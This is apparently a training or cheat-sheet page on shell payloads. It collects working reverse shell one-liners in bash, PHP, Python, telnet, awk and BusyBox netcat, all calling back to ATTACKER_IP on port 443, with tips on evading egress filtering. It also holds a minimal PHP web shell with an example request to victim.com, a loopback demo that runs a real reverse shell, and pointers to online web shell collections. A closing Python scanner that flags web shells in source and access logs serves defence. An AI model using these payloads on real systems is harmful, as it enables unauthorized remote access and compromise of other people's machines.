Shell Payloads
A shell payload is a command or script that exposes a shell over a network connection. In a bind shell the payload listens on the target and waits for the attacker's incoming connection; in a reverse shell it initiates an outbound connection back to a listener the attacker is already running. Every example below is a reverse shell calling back to ATTACKER_IP on port 443, so a listener (for example `nc -lvnp 443`) must be waiting there before the payload is run. Port 443 is a common choice because outbound HTTPS traffic is rarely blocked by egress filtering.
Bash
Normal Bash Reverse Shell
```shell
bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1
```
This reverse shell starts an interactive bash (`-i`) and redirects its input and output through a TCP connection to the attacker's IP (ATTACKER_IP) on port 443, using bash's built-in `/dev/tcp/HOST/PORT` pseudo-device. The `>&` operator sends both standard output and standard error to the socket, and `0>&1` points standard input at the same socket so commands can be read from it. `/dev/tcp` is a bash feature, not a real device file: the command fails under `sh` or `dash`, so from other shells invoke it as `bash -c '...'`.
Bash Read Line Reverse Shell
```shell
exec 5<>/dev/tcp/ATTACKER_IP/443; cat <&5 | while read line; do $line 2>&5 >&5; done
```
This variant opens file descriptor 5 read-write (`<>`) on the TCP socket, then reads the socket line by line and executes each line as a command, sending standard output and standard error back through the same descriptor. Because each received line is word-split and run directly rather than handed to a shell, pipes, redirections and quoting inside the received commands are not interpreted; wrap such commands in `sh -c '...'` or use one of the descriptor-based variants below.
Bash With File Descriptor 196 Reverse Shell
```shell
0<&196;exec 196<>/dev/tcp/ATTACKER_IP/443; sh <&196 >&196 2>&196
```
This reverse shell opens descriptor 196 on the TCP connection with `exec 196<>...` and then starts `sh` with its standard input, output and error all attached to that descriptor, so the shell reads commands from the network and writes results back through the same connection. The high descriptor number simply avoids colliding with anything the calling shell already has open. The leading `0<&196` runs before descriptor 196 exists, so it only produces a "Bad file descriptor" message and can be dropped.
Bash With File Descriptor 5 Reverse Shell
```shell
bash -i 5<> /dev/tcp/ATTACKER_IP/443 0<&5 1>&5 2>&5
```
Similar to the first example, this command opens an interactive bash (`bash -i`), but performs all the redirections on the single command line: descriptor 5 is opened read-write on the TCP connection, and standard input, output and error are then duplicated from it, giving an interactive session over the socket.
PHP
PHP Reverse Shell Using the exec Function
```shell
php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");'
```
This reverse shell opens a socket to the attacker's IP on port 443 with `fsockopen()` and then uses `exec()` to start `sh` with standard input, output and error redirected to descriptor 3. The `3` is an assumption, not something PHP guarantees: a fresh `php -r` process has only descriptors 0, 1 and 2 open, so the first socket it creates receives the next free number, 3. If the code runs inside a web server or alongside other open files, the socket lands on a higher number and the payload must be adjusted (try 4, 5, 6 and so on). The same caveat applies to the shell_exec, system, passthru and popen variants below, which differ only in the PHP function used to launch the command; the shell redirections do the actual work.
PHP Reverse Shell Using the shell_exec Function
```shell
php -r '$sock=fsockopen("ATTACKER_IP",443);shell_exec("sh <&3 >&3 2>&3");'
```
Identical to the previous command, but uses `shell_exec()`, which runs the command through the shell and would return its output as a string; here the output has already been redirected to the socket, so the return value is empty.
PHP Reverse Shell Using the system Function
```shell
php -r '$sock=fsockopen("ATTACKER_IP",443);system("sh <&3 >&3 2>&3");'
```
This reverse shell employs `system()`, which executes the command and writes its output to PHP's standard output (the browser, when the script is served by a web server). In this payload the shell's output goes to descriptor 3 instead, so nothing reaches PHP's output stream.
PHP Reverse Shell Using the passthru Function
```shell
php -r '$sock=fsockopen("ATTACKER_IP",443);passthru("sh <&3 >&3 2>&3");'
```
`passthru()` executes a command and passes its raw output straight to PHP's output stream without buffering it into a string, which is why it is the usual choice when a command returns binary data. For this payload the distinction does not matter, because the output is redirected to descriptor 3 anyway.
PHP Reverse Shell Using the popen Function
```shell
php -r '$sock=fsockopen("ATTACKER_IP",443);popen("sh <&3 >&3 2>&3", "r");'
```
This reverse shell uses `popen()` to open a process file pointer to the command; opening it in read mode (`"r"`) is enough to launch the shell, which then talks to the socket on descriptor 3 rather than through the pipe PHP created.
Python
The following snippets must be run with `python -c` (or `python3 -c`, depending on which interpreter the target provides); the placeholder PY-C stands for that prefix.
Python Reverse Shell by Exporting Environment Variables
```shell
export RHOST="ATTACKER_IP"; export RPORT=443; PY-C 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
```
This reverse shell takes the remote host and port from environment variables, connects a TCP socket to them, duplicates the socket's descriptor onto standard input, output and error with `os.dup2()`, and then spawns bash inside a pseudo-terminal with `pty.spawn()`. The pty gives a proper interactive shell, so programs that insist on a terminal (such as `su` or `sudo`) work, rather than the plain-pipe shell the non-pty payloads provide.
Python Reverse Shell Using the subprocess Module
```shell
PY-C 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```
This reverse shell sets up the socket exactly like the previous one, with the attacker's address written inline instead of read from environment variables, and then launches `/bin/sh -i` with `subprocess.call()`. The child inherits descriptors 0, 1 and 2, which now point at the socket. No pseudo-terminal is allocated, so this yields a non-tty shell.
Short Python Reverse Shell
```shell
PY-C 'import os,pty,socket;s=socket.socket();s.connect(("ATTACKER_IP",443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("bash")'
```
The compact form of the same payload: create a socket (`s`), connect to the attacker, redirect standard input, output and error to the socket with `os.dup2()`, and spawn bash in a pty. Whitespace has been removed wherever Python's grammar allows, which helps when the injection point limits payload length.
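The Bash and Python payloads above all rely on the same mechanism: open a TCP connection to the listener, make descriptors 0, 1 and 2 point at it, then start a shell that inherits them. The following Python, added here as an example and not part of the original page, runs both ends on the loopback interface so the exchange can be observed without a second machine: a listener standing in for the attacker's netcat, a forked child that performs the `dup2` steps and execs `sh`, and a driver that sends one command and collects the reply. A final helper shows why the `<&3` hard-coded in the PHP payloads is an assumption about descriptor numbering. The loopback address, the OS-chosen port and the test command are arbitrary choices for this demo.

```python
import os
import signal
import socket


def start_listener(host="127.0.0.1", port=0):
    """Listening socket standing in for the attacker's `nc -lvnp 443`; port 0 lets the OS pick a free port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def reverse_shell(host, port):
    """Victim side, same steps as the one-liners: connect, dup2 the socket over fds 0/1/2, exec sh.
    Forked into a child so the demo's own stdin/stdout are not taken over. Returns the child pid."""
    pid = os.fork()
    if pid == 0:
        try:
            s = socket.socket()
            s.connect((host, port))
            for fd in (0, 1, 2):
                # dup2 clears the close-on-exec flag Python sets on sockets, so sh inherits these
                os.dup2(s.fileno(), fd)
            os.execvp("sh", ["sh"])  # replaces this child; never returns on success
        except OSError:
            os._exit(127)
    return pid


def drive(srv, command, timeout=5.0):
    """Attacker side: accept the callback, send one command, read until the shell exits."""
    srv.settimeout(timeout)
    conn, _peer = srv.accept()
    conn.settimeout(timeout)
    conn.sendall((command + "; exit\n").encode())
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:  # EOF: the shell exited and its copies of the socket closed
            break
        chunks.append(data)
    conn.close()
    return b"".join(chunks).decode()


def demo(command="echo shell-ok; echo err-ok 1>&2"):
    """Run one full exchange over loopback and return what the attacker received.
    The default command writes to stdout and stderr to show that both reach the socket."""
    srv = start_listener()
    port = srv.getsockname()[1]
    pid = reverse_shell("127.0.0.1", port)
    try:
        return drive(srv, command)
    except Exception:
        os.kill(pid, signal.SIGKILL)  # do not leave a hung shell behind on failure
        raise
    finally:
        os.waitpid(pid, 0)
        srv.close()


def socket_fd_number():
    """Descriptor number a fresh socket receives: the lowest one not in use. In a bare `php -r`
    or `python -c` process only 0, 1 and 2 are open, so it is 3, the number the PHP payloads
    hard-code; inside a web server or a test harness it is usually higher."""
    s = socket.socket()
    try:
        return s.fileno()
    finally:
        s.close()


if __name__ == "__main__":
    print(demo(), end="")
    print("fresh socket landed on fd", socket_fd_number())
```

`demo()` returns both `shell-ok` and `err-ok` because stderr was duplicated onto the socket too; drop the `dup2` for descriptor 2 and error messages stay on the victim, which is exactly what happens with the Telnet payload below. Run the helper from a bare interpreter and it reports 3; run it from inside a program that already has files or sockets open and it reports a higher number, which is when the PHP `<&3` payloads need adjusting.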
Telnet
```shell
TF=$(mktemp -u); mkfifo $TF && telnet ATTACKER_IP 443 0<$TF | sh 1>$TF
```
This reverse shell creates a named pipe (FIFO) at a temporary path with `mkfifo`, connects to the attacker with Telnet on ATTACKER_IP port 443, and pipes whatever telnet receives into `sh`; the shell's standard output is written back into the FIFO, which telnet reads as its standard input and sends over the connection. Only standard output travels back this way, so append `2>&1` after `1>$TF` if error messages should reach the attacker as well. This is useful on hosts that have a telnet client but no netcat and no bash.
AWK
```shell
awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
```
This reverse shell uses AWK's built-in TCP support to connect to ATTACKER_IP:443 through the special file `/inet/tcp/0/HOST/PORT`: it prints a `shell>` prompt to the socket, reads a command line from it, runs that line as a coprocess (`c |& getline`), writes each line of output back over the same connection, and loops until it receives `exit`. Both the `/inet/` special files and the `|&` coprocess operator are GNU awk extensions, so the payload only works where `awk` is gawk; mawk and BusyBox awk do not support them.
BusyBox
```shell
busybox nc ATTACKER_IP 443 -e sh
```
This BusyBox reverse shell uses the netcat applet (`nc`) to connect to the attacker at ATTACKER_IP:443 and, once connected, executes `sh` with its standard input and output attached to the connection, exposing the command line to the attacker. The `-e` option only exists if BusyBox was built with the extended netcat options; running `busybox nc` with no arguments prints the usage text and shows whether the local build supports it.
Web Shells
A web shell is a script, written in a language the compromised web server can run, that executes operating-system commands through the web server process itself. It is usually a single file that takes a command (and often file-management operations) from the HTTP request and returns the result in the response. Because it sits among the legitimate files of a compromised web application and is reached over ordinary HTTP, it blends in with normal traffic and is difficult to detect, which makes it very popular among attackers.
Web shells can be written in any language the web server supports, such as PHP, ASP, JSP, or even simple CGI scripts.
Example PHP Web Shell
Let's look at an example PHP web shell to understand how this process works:
```php
<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
```
The shell above is saved to a file with the PHP extension, for example shell.php, and placed on the web server by the attacker, either by exploiting a vulnerability such as Unrestricted File Upload, File Inclusion or Command Injection, or by using access to the server they have already obtained. Whatever it executes runs with the privileges of the web server process.
After the web shell is deployed, it is reached through the URL where the file is served, in this example http://victim.com/uploads/shell.php. As the code shows, the shell expects a GET request carrying a cmd parameter whose value is the command the attacker wants to execute. For example, to run whoami the request is:
```plaintext
http://victim.com/uploads/shell.php?cmd=whoami
```
The server executes whoami and returns its output in the HTTP response, which the browser displays.
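The web shell above leaves two things a defender can look for: the source file, in which a command-execution function is fed directly from a request parameter, and the access-log entries of the requests that drive it. The following Python, added here as an example and not part of the original page, implements both checks. The PHP samples and log lines are constructed for the demo; the file name shell.php and the cmd parameter come from the example above, while the list of alternative parameter names and the benign script are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# PHP functions that hand a string to the operating system (all used by the payloads on this page).
EXEC_FUNCS = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open")
# Request superglobals that carry attacker-controlled input.
USER_INPUT = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# An exec function whose argument list contains a superglobal before the statement ends.
EXEC_FROM_REQUEST = re.compile(
    r"\b(?P<func>" + "|".join(EXEC_FUNCS) + r")\s*\([^;]*?" + USER_INPUT, re.IGNORECASE
)


def scan_php_source(src):
    """Return [(line_number, function_name)] for each exec call fed straight from the request."""
    hits = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for m in EXEC_FROM_REQUEST.finditer(line):
            hits.append((lineno, m.group("func").lower()))
    return hits


# Query-parameter names commonly used by simple web shells for the command (assumed list).
CMD_PARAMS = {"cmd", "c", "command", "exec"}
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_access_log(lines):
    """Return [(path, param, value)] for requests to .php files that carry a command parameter."""
    hits = []
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.lower().endswith(".php"):
            continue
        for name, values in parse_qs(url.query).items():
            if name.lower() in CMD_PARAMS:
                hits.append((url.path, name, values[0]))
    return hits


# Constructed samples: the shell.php from this page, a benign script that also calls system(),
# and common-log-format lines in which one client drives the uploaded shell.
SHELL_PHP = """<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>"""
BENIGN_PHP = """<?php
$name = htmlspecialchars($_GET['name']);
echo "Hello, $name";
system("date");
?>"""
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Jan/2024:10:00:09 +0000] "GET /uploads/shell.php?cmd=whoami HTTP/1.1" 200 34',
    '10.0.0.7 - - [10/Jan/2024:10:00:15 +0000] "GET /uploads/shell.php?cmd=id HTTP/1.1" 200 60',
    '10.0.0.9 - - [10/Jan/2024:10:01:00 +0000] "GET /images/logo.png?c=1 HTTP/1.1" 200 8192',
]

if __name__ == "__main__":
    print(scan_php_source(SHELL_PHP))   # the system($_GET['cmd']) line is flagged
    print(scan_php_source(BENIGN_PHP))  # system("date") with a fixed string is not
    print(scan_access_log(SAMPLE_LOG))  # the two shell.php?cmd= requests from 10.0.0.7
```

Both checks are signature matches and should be read as leads, not verdicts. One line of indirection in the source (`$c = $_GET['cmd']; system($c);`), or the encoding and obfuscation that the feature-rich shells listed below use, defeats the single-line regex, and a `cmd=` parameter is not proof of a web shell on its own. A hit is the starting point for pulling the file and the client's other requests for review.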
Existing Web Shells Available Online
The languages supported by web servers are powerful enough that web shells can pack in a lot of functionality while still trying to evade detection. Some of the most popular web shells found online are:
- p0wny-shell - A minimalistic single-file PHP web shell that allows remote command execution.
- b374k shell - A more feature-rich PHP web shell with file management and command execution, among other functionalities.
- c99 shell - A well-known and robust PHP web shell with extensive functionality.
- More web shells can be found at https://www.r57shell.net/index.php.